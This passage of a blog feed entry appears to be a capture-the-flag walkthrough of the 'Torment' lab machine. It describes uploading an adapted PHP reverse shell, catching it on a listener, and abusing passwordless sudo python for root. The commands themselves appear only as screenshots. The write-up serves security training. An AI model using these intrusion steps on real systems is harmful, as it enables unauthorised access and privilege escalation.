src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhmU-7-2D6a2gTKc9wTE8x-cVpXdQJIdCWu_rgpyIZ9bLjlwKc6Y66GYQShqjh7M1461VxQR3Umf8vDCp6lwio0MfsGuVQmlb3v7yrFiW4DMQ_TtaxANm1eYb9sArBpsbSlpQNLPqqIrZ7O/s16000/screenshot.35.jpg&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhgvClmZkCkw6F4942IueAQUW5sVP3FlhDbPk2W_BnZx5988cascbibnyyoBXusEdSVCP_QpED1IoDs_JE86_hS_H_RPKgI6ofWRBAvdjRtwy-F125JXKX5UFWD1qvrCRSeMrOvGeiB5i8W/&quot; style=&quot;clear: left; display: inline; font-family: arial; margin-bottom: 1em; margin-right: 1em; text-align: center;&quot;&gt;&lt;span style=&quot;font-size: medium;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;22&quot; data-original-width=&quot;565&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhgvClmZkCkw6F4942IueAQUW5sVP3FlhDbPk2W_BnZx5988cascbibnyyoBXusEdSVCP_QpED1IoDs_JE86_hS_H_RPKgI6ofWRBAvdjRtwy-F125JXKX5UFWD1qvrCRSeMrOvGeiB5i8W/s16000/screenshot.37.jpg&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjkjvbq_SfsIdskqxh2ea_LaRcq7Pd1cRBVU1kBE5PAdGE1LgPULH4HASxyxu4sREIiFY5-hdBUXacJQ5fGxKybRG_h3HJRG4b-p_6bvsqRqRSOQ1Fs1V31pIx0QtsEBRRUBQf9FGGwxUnW/&quot; style=&quot;clear: left; display: inline; margin-bottom: 1em; margin-right: 1em; text-align: center;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;147&quot; data-original-width=&quot;517&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjkjvbq_SfsIdskqxh2ea_LaRcq7Pd1cRBVU1kBE5PAdGE1LgPULH4HASxyxu4sREIiFY5-hdBUXacJQ5fGxKybRG_h3HJRG4b-p_6bvsqRqRSOQ1Fs1V31pIx0QtsEBRRUBQf9FGGwxUnW/s16000/screenshot.36.jpg&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Now, let&#39;s use webshell &lt;b&gt;php-reverse-shell.php&lt;/b&gt;, adapting it to our needs and renaming as &lt;b&gt;myshell.php&lt;/b&gt;:&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi7ibBTrwQ87-kDI-Gh_wU6XWVUfc_P6acTlxK6P9PUGNZ5Sr5z_e6kIbeQ5bfxWqKXzTDqboMYBISO0tBsHqvmWnH6D8VGB6lax6cs8tYmQqTIryqFqRjOyQloj1HiIkCwPak9hUeMaUu8/&quot; style=&quot;clear: left; display: inline; font-family: arial; margin-bottom: 1em; margin-right: 1em; text-align: center;&quot;&gt;&lt;span style=&quot;font-size: medium;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;137&quot; data-original-width=&quot;635&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi7ibBTrwQ87-kDI-Gh_wU6XWVUfc_P6acTlxK6P9PUGNZ5Sr5z_e6kIbeQ5bfxWqKXzTDqboMYBISO0tBsHqvmWnH6D8VGB6lax6cs8tYmQqTIryqFqRjOyQloj1HiIkCwPak9hUeMaUu8/s16000/screenshot.38.jpg&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiMbuu4dyN_97-Fp_iwSkJMe293rfaXtPd5L4-ef5zRz2pLbzZWLANkqTRMV2v5zE7a4TF5YwIAHPXNcOIk2azgAwKlvE-ePN_KCmTDNCGiRxbPGwhX32IgpZlwk5W6B8rdbfEa4cxc6XTg/&quot; style=&quot;clear: left; display: inline; margin-bottom: 1em; margin-right: 1em; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;50&quot; data-original-width=&quot;418&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiMbuu4dyN_97-Fp_iwSkJMe293rfaXtPd5L4-ef5zRz2pLbzZWLANkqTRMV2v5zE7a4TF5YwIAHPXNcOIk2azgAwKlvE-ePN_KCmTDNCGiRxbPGwhX32IgpZlwk5W6B8rdbfEa4cxc6XTg/s16000/screenshot.39.jpg&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Setting a web server at Kali:&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;/span&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjOW9UPsK27fs0U1sdOX0BvEgdHYKC5EexjJvZhZI07Bns9Wd0rGHYl5fdl_iawiSWQ5IJdQ7CClU5hFkDrM-HQEeGa2pUuORGjebN3VPffPY_GR6ovEAQesew4JC3BuK2u1E5oZeFQsDCF/&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;74&quot; data-original-width=&quot;428&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjOW9UPsK27fs0U1sdOX0BvEgdHYKC5EexjJvZhZI07Bns9Wd0rGHYl5fdl_iawiSWQ5IJdQ7CClU5hFkDrM-HQEeGa2pUuORGjebN3VPffPY_GR6ovEAQesew4JC3BuK2u1E5oZeFQsDCF/s16000/screenshot.41.jpg&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Transferring &lt;b&gt;myshell.php&lt;/b&gt; from Kali to Torment:&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;/span&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgMLV_SrpdJK6o7WXHizlP5bqfLtkUkXCmTLGEQ1MsND1wvPNrLE90f2Z7OJXIwY95OOz-U5G3ZWNm0g6uYtz9Q4KYxqaM4i_66Dw5gFxIIdk6S88OkNavUJl7-K7V_TyMpnyK4_0XAo7nB/&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;239&quot; data-original-width=&quot;864&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgMLV_SrpdJK6o7WXHizlP5bqfLtkUkXCmTLGEQ1MsND1wvPNrLE90f2Z7OJXIwY95OOz-U5G3ZWNm0g6uYtz9Q4KYxqaM4i_66Dw5gFxIIdk6S88OkNavUJl7-K7V_TyMpnyK4_0XAo7nB/s16000/screenshot.46.jpg&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Executing &lt;b&gt;/bin/sytemctl/reboot&lt;/b&gt; as a &lt;b&gt;sudoer&lt;/b&gt; we ensure that user &lt;b&gt;qiu &lt;/b&gt;runs service &lt;b&gt;apache2&lt;/b&gt;:&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;/span&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhBZeLABd142LtYatgr_qt-wVVLqoJdheZanlByohM_jN0CPq5t2h_-mEyL6VVSH3gefM8bVpLIzzjrwTEa9PfFhyllvF9qAkH3jBW29ZR5TzgA9W_Cgu6rxbg7hbABTfQ3AA8P55BClFwz/&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;291&quot; data-original-width=&quot;992&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhBZeLABd142LtYatgr_qt-wVVLqoJdheZanlByohM_jN0CPq5t2h_-mEyL6VVSH3gefM8bVpLIzzjrwTEa9PfFhyllvF9qAkH3jBW29ZR5TzgA9W_Cgu6rxbg7hbABTfQ3AA8P55BClFwz/s16000/screenshot.47.jpg&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Setting a listener at port 1234:&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;/span&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjxoa8kkiohNZ8iGlhDICrjH1y-e17J_uYExFFaGvZdKxJxDsxMUqgqS7SCpsFFl9DNf43qzaeuOoIi7hdjr-VZhu2OmdW3hM1_EOcmuOCGQxIefF4nCVz_spcu1UXqsh5HYmmG4vMd33iR/&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;74&quot; data-original-width=&quot;315&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjxoa8kkiohNZ8iGlhDICrjH1y-e17J_uYExFFaGvZdKxJxDsxMUqgqS7SCpsFFl9DNf43qzaeuOoIi7hdjr-VZhu2OmdW3hM1_EOcmuOCGQxIefF4nCVz_spcu1UXqsh5HYmmG4vMd33iR/s16000/screenshot.44.jpg&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Running &lt;b&gt;myshell.php&lt;/b&gt;:&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;/span&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgshyphenhyphen3JFIZNLTvHTkSfVED1LcDWVLy0wc76QVdArhxNoahueBxTxY7JrJVNyiAMCstjd0D5aEQ3LCKu6KW7CYjDocMbQUn9CHJukF8j7FMfRNkdfqqC_2eBm909-WNwzn4UpOcsdOuYOK-h/&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;758&quot; data-original-width=&quot;580&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgshyphenhyphen3JFIZNLTvHTkSfVED1LcDWVLy0wc76QVdArhxNoahueBxTxY7JrJVNyiAMCstjd0D5aEQ3LCKu6KW7CYjDocMbQUn9CHJukF8j7FMfRNkdfqqC_2eBm909-WNwzn4UpOcsdOuYOK-h/s16000/screenshot.48.jpg&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- A reverse shell is triggered:&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;/span&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhO42PwcDOvNpB83k3ZvWbcYxJGFJo-UCHiT6qjQYLSeRwgXCl_zJSx25yU5Sv3NuCbPeNKX8LQeWHnNJ5Bu9EvkRPaYduOk2ZGxkv4cAT38y449mbwUG5ewBPNX9qInbUCwyqPlu200L7C/&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;256&quot; data-original-width=&quot;918&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhO42PwcDOvNpB83k3ZvWbcYxJGFJo-UCHiT6qjQYLSeRwgXCl_zJSx25yU5Sv3NuCbPeNKX8LQeWHnNJ5Bu9EvkRPaYduOk2ZGxkv4cAT38y449mbwUG5ewBPNX9qInbUCwyqPlu200L7C/s16000/screenshot.50.jpg&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- We check that user &lt;b&gt;qiu&lt;/b&gt; can run&lt;b&gt; /usr/bin/python&lt;/b&gt; as a sudoer with &lt;b&gt;root&lt;/b&gt; privileges and no password:&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEipVRnWfIv8xlqBNNraHzs41v_W4ec8MwqSKtQg3GpX2WozPZkkPdv2Cce2XQ01Nm7lC456-DVSpuE7hpp-W7EzZ9cLW40DMAUeWEHFwTr5I0YdYM8IStL07oXrh6gInhRsocRBH_WYPef_/&quot; style=&quot;clear: left; display: inline; font-family: arial; margin-bottom: 1em; margin-right: 1em; text-align: center;&quot;&gt;&lt;span style=&quot;font-size: medium;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;140&quot; data-original-width=&quot;627&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEipVRnWfIv8xlqBNNraHzs41v_W4ec8MwqSKtQg3GpX2WozPZkkPdv2Cce2XQ01Nm7lC456-DVSpuE7hpp-W7EzZ9cLW40DMAUeWEHFwTr5I0YdYM8IStL07oXrh6gInhRsocRBH_WYPef_/s16000/screenshot.51.jpg&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-size: medium;&quot;&gt;&lt;span style=&quot;font-family: arial;&quot;&gt;- Using &lt;/span&gt;&lt;b style=&quot;font-family: arial;&quot;&gt;qiu&lt;/b&gt;&lt;span style=&quot;font-family: arial;&quot;&gt;&#39;s sudoer privileges we get a &lt;b&gt;root shell&lt;/b&gt;:&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;/span&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgLxZFHUxjMlOlPM_ylxVDK8DEa-8Q1-ZW_4l2068jVaphM7AIt1kZOfyQRtVnZ6oZbk1TIMnORzqdovkkmqcjS6TZYY2fl6NVe-wUlKzB67lRx-XW8Qp2vmIZu_AXTDT46zpN7gGCr48H_/&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;95&quot; data-original-width=&quot;600&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgLxZFHUxjMlOlPM_ylxVDK8DEa-8Q1-ZW_4l2068jVaphM7AIt1kZOfyQRtVnZ6oZbk1TIMnORzqdovkkmqcjS6TZYY2fl6NVe-wUlKzB67lRx-XW8Qp2vmIZu_AXTDT46zpN7gGCr48H_/s16000/screenshot.52.jpg&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;b style=&quot;color: #6fa8dc; font-family: arial;&quot;&gt;&lt;span style=&quot;font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/b&gt;&lt;/p&gt;&lt;p&gt;&lt;b style=&quot;color: #6fa8dc; font-family: arial;&quot;&gt;&lt;span style=&quot;font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/b&gt;&lt;/p&gt;&lt;p&gt;&lt;b style=&quot;color: #6fa8dc; font-family: arial;&quot;&gt;&lt;span style=&quot;font-size: medium;&quot;&gt;5 - CAPTURING THE FLAG&lt;/span&gt;&lt;/b&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Reading &lt;b&gt;proof.txt&lt;/b&gt;:&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjWp-ANJVZcWKq97i2JHc0s8eHhADUF0EUQyTc-k5xh1m2uKvF17PID1xqjS1NRfup45vut2WOPqy6jpEzZH-U9D8Lq6XXc-PDr4XJFGVLZoidnVGhncJb38ZGlmQV2HqfLQ-VsCRnKrp36/&quot; style=&quot;clear: left; display: inline; margin-bottom: 1em; margin-right: 1em; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;185&quot; data-original-width=&quot;1137&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjWp-ANJVZcWKq97i2JHc0s8eHhADUF0EUQyTc-k5xh1m2uKvF17PID1xqjS1NRfup45vut2WOPqy6jpEzZH-U9D8Lq6XXc-PDr4XJFGVLZoidnVGhncJb38ZGlmQV2HqfLQ-VsCRnKrp36/s16000/screenshot.53.jpg&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;</content><link rel='edit' type='application/atom+xml' href='https://www.blogger.com/feeds/1947953814412763707/posts/default/812421108203060996'/><link rel='self' type='application/atom+xml' href='https://www.blogger.com/feeds/1947953814412763707/posts/default/812421108203060996'/><link rel='alternate' type='text/html' href='https://www.whitelist1.com/2021/12/torment.html' title='Torment'/><author><name>Whitelist</name><uri>http://www.blogger.com/profile/11945670003912610776</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='https://img1.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi_H6O0vb5pgJD5CftB8s2EfyolmeRmq12IkT5C8s_aTzEI7v9bOZ5EoCFpyTHFl4I4nvRHff5riXfPuYcMOr_QzCLaXF2WjeHLsWO6fr1mxwKUxATWVO5hBtdYbRAZy4pAqlX-vsSUalnq/s72-c/screenshot.67.jpg" height="72" 